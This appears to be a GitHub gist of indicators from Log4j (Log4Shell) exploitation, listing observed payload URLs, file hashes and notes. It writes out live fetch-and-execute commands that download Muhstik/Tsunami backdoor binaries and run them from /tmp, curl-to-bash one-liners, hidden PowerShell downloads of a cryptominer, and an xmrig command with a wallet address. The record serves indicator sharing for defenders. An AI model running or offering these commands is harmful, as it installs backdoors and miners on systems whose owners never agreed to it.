Last active
December 15, 2021 03:13
-
-
Save yt0ng/8a87f4328c8c6cde327406ef11e68726 to your computer and use it in GitHub Desktop.
Log4j Payload Dropped
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
45.130.229.168:1389/Exploit.class | |
Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b | |
--> curl http://18.228.7.109/.log/log | |
log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b | |
--> Download of Muhstik/Tsunami Backdoor | |
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 & | |
wget -O /tmp/pty4 http://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 & | |
wget -O /tmp/pty2 http://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 & | |
wget -O /tmp/pty1 http://18.228.7.109/.log/pty1; chmod +x /tmp/pty1; chmod 700 /tmp/pty1; /tmp/pty1 & | |
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 & | |
wget -O /tmp/pty5 http://18.228.7.109/.log/pty5; chmod +x /tmp/pty5; chmod 700 /tmp/pty5; /tmp/pty5 & | |
pty3 4f34f8f156fdf12e0817a610344b11abdee87cfbed862bf91eb7685c63696898 | |
--> download of Muhstik/Tsunami | |
(curl http://210.141.105.67:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://210.141.105.67:80/wp-content/themes/twentythirteen/m8)|bash | |
(curl http://210.141.105.67:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://210.141.105.67:80/wp-content/themes/twentythirteen/m8)|bash | |
(curl http://159.89.182.117/wp-content/themes/twentyseventeen/ldm || wget -qO - http://159.89.182.117/wp-content/themes/twentyseventeen/ldm)|bash | |
m8 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514 | |
ldm 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129 | |
###### | |
Exploit.class | |
2b5f04d15e459132a5935260746788db39b469ea46859c4a5bb8625f8a80bd41 | |
--> uses curl on linux for download of http://18.228.7.109/.log/log | |
--> and uses powershell on Windows | |
(new-object System.Net.WebClient).Downloadfile('http://172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd', 's.cmd') | |
s.cmd 8A009DEE6BFB6F79C0881F5D150EEAD92C93354D47FD1CB204791320D2151634 | |
--> downloads xmrig | |
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://54.210.230.186:80/wp-content/themes/twentyfourteen/xmrig.exe','xmrig.exe') | |
xmrig.exe -o pool.supportxmr.com:5555 -u 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE -p log |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
thanks buddy!
added in here https://github.com/hackinghippo/log4shell_ioc_ips